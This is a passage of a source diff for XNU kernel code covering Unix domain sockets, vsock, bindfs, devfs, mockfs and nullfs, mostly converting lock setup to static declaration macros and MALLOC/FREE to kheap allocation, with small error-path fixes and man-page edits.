a/bsd/kern/uipc_usrreq.c +++ b/bsd/kern/uipc_usrreq.c @@ -110,14 +110,14 @@ ZONE_DECLARE(unp_zone, "unpzone", sizeof(struct unpcb), ZC_NONE); static unp_gen_t unp_gencnt; static u_int unp_count; -static lck_attr_t *unp_mtx_attr; -static lck_grp_t *unp_mtx_grp; -static lck_grp_attr_t *unp_mtx_grp_attr; -static lck_rw_t unp_list_mtx; - -static lck_mtx_t unp_disconnect_lock; -static lck_mtx_t unp_connect_lock; -static lck_mtx_t uipc_lock; +static 
LCK_ATTR_DECLARE(unp_mtx_attr, 0, 0); +static LCK_GRP_DECLARE(unp_mtx_grp, "unp_list"); +static LCK_RW_DECLARE_ATTR(unp_list_mtx, &unp_mtx_grp, &unp_mtx_attr); + +static LCK_MTX_DECLARE_ATTR(unp_disconnect_lock, &unp_mtx_grp, &unp_mtx_attr); +static LCK_MTX_DECLARE_ATTR(unp_connect_lock, &unp_mtx_grp, &unp_mtx_attr); +static LCK_MTX_DECLARE_ATTR(uipc_lock, &unp_mtx_grp, &unp_mtx_attr); + static u_int disconnect_in_progress; static struct unp_head unp_shead, unp_dhead; @@ -917,8 +917,7 @@ unp_attach(struct socket *so) } bzero(unp, sizeof(*unp)); - lck_mtx_init(&unp->unp_mtx, - unp_mtx_grp, unp_mtx_attr); + lck_mtx_init(&unp->unp_mtx, &unp_mtx_grp, &unp_mtx_attr); lck_rw_lock_exclusive(&unp_list_mtx); LIST_INIT(&unp->unp_refs); @@ -1743,8 +1742,8 @@ unp_pcblist SYSCTL_HANDLER_ARGS return 0; } - MALLOC(unp_list, struct unpcb **, n * sizeof(*unp_list), - M_TEMP, M_WAITOK); + size_t unp_list_len = n * sizeof(*unp_list); + unp_list = kheap_alloc(KHEAP_TEMP, unp_list_len, Z_WAITOK); if (unp_list == 0) { lck_rw_done(&unp_list_mtx); return ENOMEM; @@ -1801,7 +1800,7 @@ unp_pcblist SYSCTL_HANDLER_ARGS xug.xug_count = unp_count; error = SYSCTL_OUT(req, &xug, sizeof(xug)); } - FREE(unp_list, M_TEMP); + kheap_free(KHEAP_TEMP, unp_list, unp_list_len); lck_rw_done(&unp_list_mtx); return error; } @@ -1872,8 +1871,8 @@ unp_pcblist64 SYSCTL_HANDLER_ARGS return 0; } - MALLOC(unp_list, struct unpcb **, n * sizeof(*unp_list), - M_TEMP, M_WAITOK); + size_t unp_list_size = n * sizeof(*unp_list); + unp_list = kheap_alloc(KHEAP_TEMP, unp_list_size, Z_WAITOK); if (unp_list == 0) { lck_rw_done(&unp_list_mtx); return ENOMEM; @@ -1954,7 +1953,7 @@ unp_pcblist64 SYSCTL_HANDLER_ARGS xug.xug_count = unp_count; error = SYSCTL_OUT(req, &xug, sizeof(xug)); } - FREE(unp_list, M_TEMP); + kheap_free(KHEAP_TEMP, unp_list, unp_list_size); lck_rw_done(&unp_list_mtx); return error; } @@ -2156,8 +2155,8 @@ unp_externalize(struct mbuf *rights) int newfds = (cm->cmsg_len - sizeof(*cm)) / sizeof(int); int f, 
error = 0; - MALLOC(fileproc_l, struct fileproc **, - newfds * sizeof(struct fileproc *), M_TEMP, M_WAITOK); + fileproc_l = kheap_alloc(KHEAP_TEMP, + newfds * sizeof(struct fileproc *), Z_WAITOK); if (fileproc_l == NULL) { error = ENOMEM; goto discard; @@ -2222,9 +2221,8 @@ unp_externalize(struct mbuf *rights) } discard: - if (fileproc_l != NULL) { - FREE(fileproc_l, M_TEMP); - } + kheap_free(KHEAP_TEMP, fileproc_l, + newfds * sizeof(struct fileproc *)); if (error) { for (i = 0; i < newfds; i++) { unp_discard(*rp, p); @@ -2240,20 +2238,6 @@ unp_init(void) _CASSERT(UIPC_MAX_CMSG_FD >= (MCLBYTES / sizeof(int))); LIST_INIT(&unp_dhead); LIST_INIT(&unp_shead); - - /* - * allocate lock group attribute and group for udp pcb mutexes - */ - unp_mtx_grp_attr = lck_grp_attr_alloc_init(); - - unp_mtx_grp = lck_grp_alloc_init("unp_list", unp_mtx_grp_attr); - - unp_mtx_attr = lck_attr_alloc_init(); - - lck_mtx_init(&uipc_lock, unp_mtx_grp, unp_mtx_attr); - lck_rw_init(&unp_list_mtx, unp_mtx_grp, unp_mtx_attr); - lck_mtx_init(&unp_disconnect_lock, unp_mtx_grp, unp_mtx_attr); - lck_mtx_init(&unp_connect_lock, unp_mtx_grp, unp_mtx_attr); } #ifndef MIN @@ -2482,8 +2466,8 @@ unp_gc(void) * * 91/09/19, bsy@cs.cmu.edu */ - MALLOC(extra_ref, struct fileglob **, nfiles * sizeof(struct fileglob *), - M_TEMP, M_WAITOK); + size_t extra_ref_size = nfiles * sizeof(struct fileglob *); + extra_ref = kheap_alloc(KHEAP_TEMP, extra_ref_size, Z_WAITOK); if (extra_ref == NULL) { goto bail; } @@ -2539,7 +2523,8 @@ unp_gc(void) fg_drop(PROC_NULL, *fpp); } - FREE(extra_ref, M_TEMP); + kheap_free(KHEAP_TEMP, extra_ref, extra_ref_size); + bail: lck_mtx_lock(&uipc_lock); unp_gcing = 0; @@ -2708,7 +2693,7 @@ unp_unlock(struct socket *so, int refcount, void * lr) lck_mtx_unlock(mutex_held); - lck_mtx_destroy(&unp->unp_mtx, unp_mtx_grp); + lck_mtx_destroy(&unp->unp_mtx, &unp_mtx_grp); zfree(unp_zone, unp); unp_gc(); diff --git a/bsd/kern/vsock_domain.c b/bsd/kern/vsock_domain.c index ae118349d..2f3e69a71 
100644 --- a/bsd/kern/vsock_domain.c +++ b/bsd/kern/vsock_domain.c @@ -50,6 +50,7 @@ static struct vsock_transport * _Atomic the_vsock_transport = NULL; static ZONE_DECLARE(vsockpcb_zone, "vsockpcbzone", sizeof(struct vsockpcb), ZC_NONE); +static LCK_GRP_DECLARE(vsock_lock_grp, "vsock"); static struct vsockpcbinfo vsockinfo; static uint32_t vsock_sendspace = VSOCK_MAX_PACKET_SIZE * 8; @@ -70,7 +71,7 @@ vsock_get_matching_pcb(struct vsock_address src, struct vsock_address dst) struct vsockpcb *match = NULL; struct vsockpcb *pcb = NULL; - lck_rw_lock_shared(vsockinfo.bound_lock); + lck_rw_lock_shared(&vsockinfo.bound_lock); LIST_FOREACH(pcb, &vsockinfo.bound, bound) { // Source cid and port must match. Only destination port must match. (Allows for a changing CID during migration) socket_lock(pcb->so, 1); @@ -89,7 +90,7 @@ vsock_get_matching_pcb(struct vsock_address src, struct vsock_address dst) socket_lock(match->so, 1); preferred = match; } - lck_rw_done(vsockinfo.bound_lock); + lck_rw_done(&vsockinfo.bound_lock); return preferred; } @@ -111,7 +112,7 @@ vsock_bind_address_if_free(struct vsockpcb *pcb, uint32_t local_cid, uint32_t lo struct vsockpcb *pcb_match = NULL; socket_unlock(pcb->so, 0); - lck_rw_lock_exclusive(vsockinfo.bound_lock); + lck_rw_lock_exclusive(&vsockinfo.bound_lock); LIST_FOREACH(pcb_match, &vsockinfo.bound, bound) { socket_lock(pcb_match->so, 1); if (pcb == pcb_match || @@ -130,7 +131,7 @@ vsock_bind_address_if_free(struct vsockpcb *pcb, uint32_t local_cid, uint32_t lo pcb->remote_address = (struct vsock_address) { .cid = remote_cid, .port = remote_port }; LIST_INSERT_HEAD(&vsockinfo.bound, pcb, bound); } - lck_rw_done(vsockinfo.bound_lock); + lck_rw_done(&vsockinfo.bound_lock); return taken ? 
EADDRINUSE : 0; } @@ -225,10 +226,10 @@ vsock_unbind_pcb(struct vsockpcb *pcb, bool is_locked) if (!is_locked) { socket_unlock(pcb->so, 0); - lck_rw_lock_exclusive(vsockinfo.bound_lock); + lck_rw_lock_exclusive(&vsockinfo.bound_lock); socket_lock(pcb->so, 0); if (!pcb->bound.le_prev) { - lck_rw_done(vsockinfo.bound_lock); + lck_rw_done(&vsockinfo.bound_lock); return; } } @@ -238,7 +239,7 @@ vsock_unbind_pcb(struct vsockpcb *pcb, bool is_locked) pcb->bound.le_prev = NULL; if (!is_locked) { - lck_rw_done(vsockinfo.bound_lock); + lck_rw_done(&vsockinfo.bound_lock); } } @@ -250,12 +251,12 @@ vsock_new_sockaddr(struct vsock_address *address) } struct sockaddr_vm *addr; - MALLOC(addr, struct sockaddr_vm *, sizeof(*addr), M_SONAME, M_WAITOK); + MALLOC(addr, struct sockaddr_vm *, sizeof(*addr), M_SONAME, + M_WAITOK | M_ZERO); if (!addr) { return NULL; } - bzero(addr, sizeof(*addr)); addr->svm_len = sizeof(*addr); addr->svm_family = AF_VSOCK; addr->svm_port = address->port; @@ -629,7 +630,7 @@ vsock_reset_transport(struct vsock_transport *transport) struct vsockpcb *pcb = NULL; struct vsockpcb *tmp_pcb = NULL; - lck_rw_lock_exclusive(vsockinfo.bound_lock); + lck_rw_lock_exclusive(&vsockinfo.bound_lock); LIST_FOREACH_SAFE(pcb, &vsockinfo.bound, bound, tmp_pcb) { // Disconnect this transport's sockets. Listen and bind sockets must stay alive. socket_lock(pcb->so, 1); @@ -641,7 +642,7 @@ vsock_reset_transport(struct vsock_transport *transport) } socket_unlock(pcb->so, 1); } - lck_rw_done(vsockinfo.bound_lock); + lck_rw_done(&vsockinfo.bound_lock); return error; } @@ -722,10 +723,10 @@ vsock_pcblist SYSCTL_HANDLER_ARGS } // Get the generation count and the count of all vsock sockets. 
- lck_rw_lock_shared(vsockinfo.all_lock); + lck_rw_lock_shared(&vsockinfo.all_lock); uint64_t n = vsockinfo.all_pcb_count; vsock_gen_t gen_count = vsockinfo.vsock_gencnt; - lck_rw_done(vsockinfo.all_lock); + lck_rw_done(&vsockinfo.all_lock); const size_t xpcb_len = sizeof(struct xvsockpcb); struct xvsockpgen xvg; @@ -758,7 +759,7 @@ vsock_pcblist SYSCTL_HANDLER_ARGS return 0; } - lck_rw_lock_shared(vsockinfo.all_lock); + lck_rw_lock_shared(&vsockinfo.all_lock); n = 0; struct vsockpcb *pcb = NULL; @@ -803,7 +804,7 @@ vsock_pcblist SYSCTL_HANDLER_ARGS // Update the generation count to match the sockets being returned. gen_count = vsockinfo.vsock_gencnt; - lck_rw_done(vsockinfo.all_lock); + lck_rw_done(&vsockinfo.all_lock); if (!error) { /* @@ -886,11 +887,11 @@ vsock_attach(struct socket *so, int proto, struct proc *p) } // Add to the list of all vsock sockets. - lck_rw_lock_exclusive(vsockinfo.all_lock); + lck_rw_lock_exclusive(&vsockinfo.all_lock); TAILQ_INSERT_TAIL(&vsockinfo.all, pcb, all); vsockinfo.all_pcb_count++; pcb->vsock_gencnt = ++vsockinfo.vsock_gencnt; - lck_rw_done(vsockinfo.all_lock); + lck_rw_done(&vsockinfo.all_lock); return 0; } @@ -950,13 +951,13 @@ vsock_detach(struct socket *so) } // Remove from the list of all vsock sockets. - lck_rw_lock_exclusive(vsockinfo.all_lock); + lck_rw_lock_exclusive(&vsockinfo.all_lock); TAILQ_REMOVE(&vsockinfo.all, pcb, all); pcb->all.tqe_next = NULL; pcb->all.tqe_prev = NULL; vsockinfo.all_pcb_count--; vsockinfo.vsock_gencnt++; - lck_rw_done(vsockinfo.all_lock); + lck_rw_done(&vsockinfo.all_lock); // Deallocate any resources. zfree(vsockpcb_zone, pcb); @@ -1380,15 +1381,9 @@ vsock_init(struct protosw *pp, struct domain *dp) } // Setup VSock protocol info struct. 
- vsockinfo.vsock_lock_grp_attr = lck_grp_attr_alloc_init(); - vsockinfo.vsock_lock_grp = lck_grp_alloc_init("vsock", vsockinfo.vsock_lock_grp_attr); - vsockinfo.vsock_lock_attr = lck_attr_alloc_init(); - if ((vsockinfo.all_lock = lck_rw_alloc_init(vsockinfo.vsock_lock_grp, vsockinfo.vsock_lock_attr)) == NULL || - (vsockinfo.bound_lock = lck_rw_alloc_init(vsockinfo.vsock_lock_grp, vsockinfo.vsock_lock_attr)) == NULL) { - panic("%s: unable to allocate PCB lock\n", __func__); - /* NOTREACHED */ - } - lck_mtx_init(&vsockinfo.port_lock, vsockinfo.vsock_lock_grp, vsockinfo.vsock_lock_attr); + lck_rw_init(&vsockinfo.all_lock, &vsock_lock_grp, LCK_ATTR_NULL); + lck_rw_init(&vsockinfo.bound_lock, &vsock_lock_grp, LCK_ATTR_NULL); + lck_mtx_init(&vsockinfo.port_lock, &vsock_lock_grp, LCK_ATTR_NULL); TAILQ_INIT(&vsockinfo.all); LIST_INIT(&vsockinfo.bound); vsockinfo.last_port = VMADDR_PORT_ANY; diff --git a/bsd/man/man2/clonefile.2 b/bsd/man/man2/clonefile.2 index 114321e0d..56b8d0a92 100644 --- a/bsd/man/man2/clonefile.2 +++ b/bsd/man/man2/clonefile.2 @@ -44,7 +44,7 @@ The cloned file .Fa dst shares its data blocks with the .Fa src -file but has its own copy of attributes, extended attributes and ACL's which are identical to +file but has its own copy of attributes and extended attributes which are identical to those of the named file .Fa src with the exceptions listed below diff --git a/bsd/man/man2/mount.2 b/bsd/man/man2/mount.2 index 586707fa6..98e6e25bb 100644 --- a/bsd/man/man2/mount.2 +++ b/bsd/man/man2/mount.2 @@ -208,6 +208,8 @@ may fail with one of the following errors: The caller is not the super-user, and the .Nm mount() was not done by the user. +.It Bq Er EPERM +A system policy denied the operation. .It Bq Er ENOTDIR A component of the path is not a directory. 
.It Bq Er EINVAL diff --git a/bsd/miscfs/bindfs/bind_subr.c b/bsd/miscfs/bindfs/bind_subr.c index 58b67705e..2b4500f04 100644 --- a/bsd/miscfs/bindfs/bind_subr.c +++ b/bsd/miscfs/bindfs/bind_subr.c @@ -82,10 +82,8 @@ #define BIND_NHASH(vp) (&bind_node_hashtbl[((((uintptr_t)vp) >> vnsz2log) + (uintptr_t)vnode_mount(vp)) & bind_hash_mask]) static LIST_HEAD(bind_node_hashhead, bind_node) * bind_node_hashtbl; -static lck_mtx_t bind_hashmtx; -static lck_attr_t * bind_hashlck_attr; -static lck_grp_t * bind_hashlck_grp; -static lck_grp_attr_t * bind_hashlck_grp_attr; +static LCK_GRP_DECLARE(bind_hashlck_grp, "com.apple.filesystems.bindfs"); +static LCK_MTX_DECLARE(bind_hashmtx, &bind_hashlck_grp); static u_long bind_hash_mask; /* xnu doesn't have hashes built into vnodes. This mimics what freebsd does @@ -94,28 +92,6 @@ static int vnsz2log = 9; static int bind_hashins(struct mount *, struct bind_node *, struct vnode **); -int -bindfs_init_lck(lck_mtx_t * lck) -{ - int error = 1; - if (lck && bind_hashlck_grp && bind_hashlck_attr) { - lck_mtx_init(lck, bind_hashlck_grp, bind_hashlck_attr); - error = 0; - } - return error; -} - -int -bindfs_destroy_lck(lck_mtx_t * lck) -{ - int error = 1; - if (lck && bind_hashlck_grp) { - lck_mtx_destroy(lck, bind_hashlck_grp); - error = 0; - } - return error; -} - /* * Initialise cache headers */ @@ -124,43 +100,15 @@ bindfs_init(__unused struct vfsconf * vfsp) { BINDFSDEBUG("%s\n", __FUNCTION__); - /* assuming for now that this happens immediately and by default after fs - * installation */ - bind_hashlck_grp_attr = lck_grp_attr_alloc_init(); - if (bind_hashlck_grp_attr == NULL) { - goto error; - } - bind_hashlck_grp = lck_grp_alloc_init("com.apple.filesystems.bindfs", bind_hashlck_grp_attr); - if (bind_hashlck_grp == NULL) { - goto error; - } - bind_hashlck_attr = lck_attr_alloc_init(); - if (bind_hashlck_attr == NULL) { - goto error; - } - bind_node_hashtbl = hashinit(BIND_HASH_SIZE, M_TEMP, &bind_hash_mask); if (bind_node_hashtbl == 
NULL) { goto error; } - lck_mtx_init(&bind_hashmtx, bind_hashlck_grp, bind_hashlck_attr); BINDFSDEBUG("%s finished\n", __FUNCTION__); return 0; error: printf("BINDFS: failed to initialize globals\n"); - if (bind_hashlck_grp_attr) { - lck_grp_attr_free(bind_hashlck_grp_attr); - bind_hashlck_grp_attr = NULL; - } - if (bind_hashlck_grp) { - lck_grp_free(bind_hashlck_grp); - bind_hashlck_grp = NULL; - } - if (bind_hashlck_attr) { - lck_attr_free(bind_hashlck_attr); - bind_hashlck_attr = NULL; - } return KERN_FAILURE; } @@ -169,20 +117,7 @@ bindfs_destroy(void) { /* This gets called when the fs is uninstalled, there wasn't an exact * equivalent in vfsops */ - lck_mtx_destroy(&bind_hashmtx, bind_hashlck_grp); hashdestroy(bind_node_hashtbl, M_TEMP, bind_hash_mask); - if (bind_hashlck_grp_attr) { - lck_grp_attr_free(bind_hashlck_grp_attr); - bind_hashlck_grp_attr = NULL; - } - if (bind_hashlck_grp) { - lck_grp_free(bind_hashlck_grp); - bind_hashlck_grp = NULL; - } - if (bind_hashlck_attr) { - lck_attr_free(bind_hashlck_attr); - bind_hashlck_attr = NULL; - } return 0; } diff --git a/bsd/miscfs/bindfs/bind_vnops.c b/bsd/miscfs/bindfs/bind_vnops.c index 2290bd890..726337c1e 100644 --- a/bsd/miscfs/bindfs/bind_vnops.c +++ b/bsd/miscfs/bindfs/bind_vnops.c @@ -246,11 +246,10 @@ notdot: if (error == 0) { *ap->a_vpp = vp; } - } - - /* if we got lvp, drop the iocount from VNOP_LOOKUP */ - if (lvp != NULL) { - vnode_put(lvp); + /* if we got lvp, drop the iocount from VNOP_LOOKUP */ + if (lvp != NULL) { + vnode_put(lvp); + } } return error; @@ -334,7 +333,7 @@ bindfs_readdir(struct vnop_readdir_args * ap) struct dirent *dep; size_t bytesread; bufsize = 3 * MIN((user_size_t)uio_resid(uio), 87371u) / 8; - MALLOC(bufptr, void *, bufsize, M_TEMP, M_WAITOK); + bufptr = kheap_alloc(KHEAP_TEMP, bufsize, Z_WAITOK); if (bufptr == NULL) { return ENOMEM; } @@ -377,7 +376,7 @@ bindfs_readdir(struct vnop_readdir_args * ap) uio_setoffset(uio, uio_offset(auio)); } uio_free(auio); - FREE(bufptr, 
M_TEMP); + kheap_free(KHEAP_TEMP, bufptr, bufsize); } else { error = VNOP_READDIR(lvp, ap->a_uio, ap->a_flags, ap->a_eofflag, ap->a_numdirent, ap->a_context); vnode_put(lvp); diff --git a/bsd/miscfs/bindfs/bindfs.h b/bsd/miscfs/bindfs/bindfs.h index c50a91f4d..c3bebc8a4 100644 --- a/bsd/miscfs/bindfs/bindfs.h +++ b/bsd/miscfs/bindfs/bindfs.h @@ -127,8 +127,6 @@ struct vnodeop_desc_fake { __BEGIN_DECLS int bindfs_init(struct vfsconf * vfsp); -int bindfs_init_lck(lck_mtx_t * lck); -int bindfs_destroy_lck(lck_mtx_t * lck); int bindfs_destroy(void); int bind_nodeget( struct mount * mp, struct vnode * lowervp, struct vnode * dvp, struct vnode ** vpp, struct componentname * cnp, int root); diff --git a/bsd/miscfs/devfs/devfs_fdesc_support.c b/bsd/miscfs/devfs/devfs_fdesc_support.c index 9c861796f..c615ea620 100644 --- a/bsd/miscfs/devfs/devfs_fdesc_support.c +++ b/bsd/miscfs/devfs/devfs_fdesc_support.c @@ -113,8 +113,8 @@ u_long fdhash; static int fdesc_attr(int fd, struct vnode_attr *vap, vfs_context_t a_context); -lck_mtx_t fdesc_mtx; -lck_grp_t *fdesc_lckgrp; +static LCK_GRP_DECLARE(fdesc_lckgrp, "fdesc"); +static LCK_MTX_DECLARE(fdesc_mtx, &fdesc_lckgrp); static void fdesc_lock(void) @@ -141,8 +141,6 @@ devfs_fdesc_init() /* XXX Make sure you have the right path... 
*/ fdhashtbl = hashinit(NFDCACHE, M_CACHE, &fdhash); - fdesc_lckgrp = lck_grp_alloc_init("fdesc", NULL); - lck_mtx_init(&fdesc_mtx, fdesc_lckgrp, NULL); DEVFS_LOCK(); dev_add_entry("fd", rootdir, DEV_DEVFD, NULL, NULL, NULL, &direntp); @@ -311,7 +309,7 @@ devfs_devfd_lookup(struct vnop_lookup_args *ap) *vpp = dvp; if ((error = vnode_get(dvp))) { - return error; + goto bad; } return 0; } diff --git a/bsd/miscfs/devfs/devfs_tree.c b/bsd/miscfs/devfs/devfs_tree.c index 21a0ac5c0..5acacb6ea 100644 --- a/bsd/miscfs/devfs/devfs_tree.c +++ b/bsd/miscfs/devfs/devfs_tree.c @@ -145,11 +145,9 @@ static devdirent_t *devfs_make_node_internal(dev_t, devfstype_t type, uid_t, gid int (*clone)(dev_t dev, int action), const char *fmt, va_list ap); -lck_grp_t * devfs_lck_grp; -lck_grp_attr_t * devfs_lck_grp_attr; -lck_attr_t * devfs_lck_attr; -lck_mtx_t devfs_mutex; -lck_mtx_t devfs_attr_mutex; +static LCK_GRP_DECLARE(devfs_lck_grp, "devfs_lock"); +LCK_MTX_DECLARE(devfs_mutex, &devfs_lck_grp); +LCK_MTX_DECLARE(devfs_attr_mutex, &devfs_lck_grp); os_refgrp_decl(static, devfs_refgrp, "devfs", NULL); @@ -183,14 +181,6 @@ devfs_sinit(void) { int error; - devfs_lck_grp_attr = lck_grp_attr_alloc_init(); - devfs_lck_grp = lck_grp_alloc_init("devfs_lock", devfs_lck_grp_attr); - - devfs_lck_attr = lck_attr_alloc_init(); - - lck_mtx_init(&devfs_mutex, devfs_lck_grp, devfs_lck_attr); - lck_mtx_init(&devfs_attr_mutex, devfs_lck_grp, devfs_lck_attr); - DEVFS_LOCK(); error = dev_add_entry("root", NULL, DEV_DIR, NULL, NULL, NULL, &dev_root); DEVFS_UNLOCK(); diff --git a/bsd/miscfs/devfs/devfs_vfsops.c b/bsd/miscfs/devfs/devfs_vfsops.c index f01b26873..d5426b182 100644 --- a/bsd/miscfs/devfs/devfs_vfsops.c +++ b/bsd/miscfs/devfs/devfs_vfsops.c @@ -495,7 +495,7 @@ devfs_kernel_mount(char * mntname) vfs_context_t ctx = vfs_context_kernel(); char fsname[] = "devfs"; - error = kernel_mount(fsname, NULLVP, NULLVP, mntname, NULL, 0, MNT_DONTBROWSE, KERNEL_MOUNT_NOAUTH, ctx); + error = kernel_mount(fsname, 
NULLVP, NULLVP, mntname, NULL, 0, MNT_DONTBROWSE, KERNEL_MOUNT_NOAUTH | KERNEL_MOUNT_DEVFS, ctx); if (error) { printf("devfs_kernel_mount: kernel_mount failed: %d\n", error); return error; diff --git a/bsd/miscfs/mockfs/mockfs.h b/bsd/miscfs/mockfs/mockfs.h index dab2af734..07c91ffaf 100644 --- a/bsd/miscfs/mockfs/mockfs.h +++ b/bsd/miscfs/mockfs/mockfs.h @@ -54,10 +54,6 @@ * For the moment, mockfs is not marked in vfs_conf.c as being threadsafe. */ -extern lck_attr_t * mockfs_mtx_attr; -extern lck_grp_attr_t * mockfs_grp_attr; -extern lck_grp_t * mockfs_mtx_grp; - struct mockfs_mount { lck_mtx_t mockfs_mnt_mtx; /* Mount-wide (and tree-wide) mutex */ mockfs_fsnode_t mockfs_root; /* Root of the node tree */ diff --git a/bsd/miscfs/mockfs/mockfs_vfsops.c b/bsd/miscfs/mockfs/mockfs_vfsops.c index 4a524a054..588fa7aad 100644 --- a/bsd/miscfs/mockfs/mockfs_vfsops.c +++ b/bsd/miscfs/mockfs/mockfs_vfsops.c @@ -39,9 +39,7 @@ #include #include -lck_attr_t * mockfs_mtx_attr = (lck_attr_t *) 0; -lck_grp_attr_t * mockfs_grp_attr = (lck_grp_attr_t *) 0; -lck_grp_t * mockfs_mtx_grp = (lck_grp_t *) 0; +static LCK_GRP_DECLARE(mockfs_mtx_grp, "mockfs-mutex"); int mockfs_mountroot(mount_t mp, vnode_t rvp, __unused vfs_context_t ctx); @@ -111,7 +109,7 @@ mockfs_mountroot(mount_t mp, vnode_t rvp, __unused vfs_context_t ctx) } } - lck_mtx_init(&mockfs_mount_data->mockfs_mnt_mtx, mockfs_mtx_grp, mockfs_mtx_attr); + lck_mtx_init(&mockfs_mount_data->mockfs_mnt_mtx, &mockfs_mtx_grp, LCK_ATTR_NULL); /* * All of the needed nodes/structures have been set up; now we just need to establish the relationships @@ -140,7 +138,7 @@ done: mockfs_fsnode_destroy(root_fsnode); } if (mockfs_mount_data) { - lck_mtx_destroy(&mockfs_mount_data->mockfs_mnt_mtx, mockfs_mtx_grp); + lck_mtx_destroy(&mockfs_mount_data->mockfs_mnt_mtx, &mockfs_mtx_grp); FREE(mockfs_mount_data, M_TEMP); } } @@ -193,7 +191,7 @@ mockfs_unmount(struct mount *mp, int mntflags, __unused vfs_context_t ctx) panic("mockfs_unmount: Failed 
to destroy the fsnode tree"); } - lck_mtx_destroy(&mockfs_mnt->mockfs_mnt_mtx, mockfs_mtx_grp); + lck_mtx_destroy(&mockfs_mnt->mockfs_mnt_mtx, &mockfs_mtx_grp); FREE(mockfs_mnt, M_TEMP); mp->mnt_data = NULL; @@ -227,28 +225,9 @@ mockfs_sync(__unused struct mount *mp, __unused int waitfor, __unused vfs_contex return 0; } -/* - * mockfs_init: - * Run once (during VFS initialization); takes care of generic mockfs initialization (which for now, means - * global lock information). - * - * Returns 0 on success, or an error. - */ int mockfs_init(__unused struct vfsconf * vfsc) { - mockfs_mtx_attr = lck_attr_alloc_init(); - mockfs_grp_attr = lck_grp_attr_alloc_init(); - mockfs_mtx_grp = lck_grp_alloc_init("mockfs-mutex", mockfs_grp_attr); - - /* - * If we've failed to allocate this early in boot, something is horrendously wrong; it should be fine to - * panic (for now). - */ - if (!mockfs_mtx_attr || !mockfs_grp_attr || !mockfs_mtx_grp) { - panic("mockfs_init failed to allocate lock information"); - } - return 0; } diff --git a/bsd/miscfs/nullfs/null_subr.c b/bsd/miscfs/nullfs/null_subr.c index caffb546a..4561bec50 100644 --- a/bsd/miscfs/nullfs/null_subr.c +++ b/bsd/miscfs/nullfs/null_subr.c @@ -82,10 +82,8 @@ #define NULL_NHASH(vp) (&null_node_hashtbl[((((uintptr_t)vp) >> vnsz2log) + (uintptr_t)vnode_mount(vp)) & null_hash_mask]) static LIST_HEAD(null_node_hashhead, null_node) * null_node_hashtbl; -static lck_mtx_t null_hashmtx; -static lck_attr_t * null_hashlck_attr; -static lck_grp_t * null_hashlck_grp; -static lck_grp_attr_t * null_hashlck_grp_attr; +static LCK_GRP_DECLARE(null_hashlck_grp, "com.apple.filesystems.nullfs"); +static LCK_MTX_DECLARE(null_hashmtx, &null_hashlck_grp); static u_long null_hash_mask; /* os x doesn't have hashes built into vnode. 
gonna try doing what freebsd does @@ -97,26 +95,16 @@ static int vnsz2log = 9; static int null_hashins(struct mount *, struct null_node *, struct vnode **); -int +void nullfs_init_lck(lck_mtx_t * lck) { - int error = 1; - if (lck && null_hashlck_grp && null_hashlck_attr) { - lck_mtx_init(lck, null_hashlck_grp, null_hashlck_attr); - error = 0; - } - return error; + lck_mtx_init(lck, &null_hashlck_grp, LCK_ATTR_NULL); } -int +void nullfs_destroy_lck(lck_mtx_t * lck) { - int error = 1; - if (lck && null_hashlck_grp) { - lck_mtx_destroy(lck, null_hashlck_grp); - error = 0; - } - return error; + lck_mtx_destroy(lck, &null_hashlck_grp); } /* @@ -126,62 +114,17 @@ int nullfs_init(__unused struct vfsconf * vfsp) { NULLFSDEBUG("%s\n", __FUNCTION__); - - /* assuming for now that this happens immediately and by default after fs - * installation */ - null_hashlck_grp_attr = lck_grp_attr_alloc_init(); - if (null_hashlck_grp_attr == NULL) { - goto error; - } - null_hashlck_grp = lck_grp_alloc_init("com.apple.filesystems.nullfs", null_hashlck_grp_attr); - if (null_hashlck_grp == NULL) { - goto error; - } - null_hashlck_attr = lck_attr_alloc_init(); - if (null_hashlck_attr == NULL) { - goto error; - } - - lck_mtx_init(&null_hashmtx, null_hashlck_grp, null_hashlck_attr); null_node_hashtbl = hashinit(NULL_HASH_SIZE, M_TEMP, &null_hash_mask); NULLFSDEBUG("%s finished\n", __FUNCTION__); return 0; -error: - printf("NULLFS: failed to get lock element\n"); - if (null_hashlck_grp_attr) { - lck_grp_attr_free(null_hashlck_grp_attr); - null_hashlck_grp_attr = NULL; - } - if (null_hashlck_grp) { - lck_grp_free(null_hashlck_grp); - null_hashlck_grp = NULL; - } - if (null_hashlck_attr) { - lck_attr_free(null_hashlck_attr); - null_hashlck_attr = NULL; - } - return KERN_FAILURE; } int -nullfs_uninit() +nullfs_uninit(void) { /* This gets called when the fs is uninstalled, there wasn't an exact * equivalent in vfsops */ - lck_mtx_destroy(&null_hashmtx, null_hashlck_grp); 
hashdestroy(null_node_hashtbl, M_TEMP, null_hash_mask); - if (null_hashlck_grp_attr) { - lck_grp_attr_free(null_hashlck_grp_attr); - null_hashlck_grp_attr = NULL; - } - if (null_hashlck_grp) { - lck_grp_free(null_hashlck_grp); - null_hashlck_grp = NULL; - } - if (null_hashlck_attr) { - lck_attr_free(null_hashlck_attr); - null_hashlck_attr = NULL; - } return 0; } diff --git a/bsd/miscfs/nullfs/null_vfsops.c b/bsd/miscfs/nullfs/null_vfsops.c index b09395429..c0f5ac6e7 100644 --- a/bsd/miscfs/nullfs/null_vfsops.c +++ b/bsd/miscfs/nullfs/null_vfsops.c @@ -221,10 +221,7 @@ nullfs_mount(struct mount * mp, __unused vnode_t devvp, user_addr_t user_data, v vnode_ref(vp); vnode_put(vp); - error = nullfs_init_lck(&xmp->nullm_lock); - if (error) { - goto error; - } + nullfs_init_lck(&xmp->nullm_lock); xmp->nullm_rootvp = vp; diff --git a/bsd/miscfs/nullfs/null_vnops.c b/bsd/miscfs/nullfs/null_vnops.c index a351309c3..176f84e74 100644 --- a/bsd/miscfs/nullfs/null_vnops.c +++ b/bsd/miscfs/nullfs/null_vnops.c @@ -403,6 +403,9 @@ null_get_lowerparent(vnode_t lvp, vnode_t * dvpp, vfs_context_t ctx) error = vnode_getattr(lvp, &va, ctx); if (error || !VATTR_IS_SUPPORTED(&va, va_parentid)) { + if (!error) { + error = ENOTSUP; + } goto end; } @@ -605,11 +608,10 @@ notdot: if (error == 0) { *ap->a_vpp = vp; } - } - - /* if we got lvp, drop the iocount from VNOP_LOOKUP */ - if (lvp != NULL) { - vnode_put(lvp); + /* if we got lvp, drop the iocount from VNOP_LOOKUP */ + if (lvp != NULL) { + vnode_put(lvp); + } } nullfs_cleanup_patched_context(null_mp, ectx); diff --git 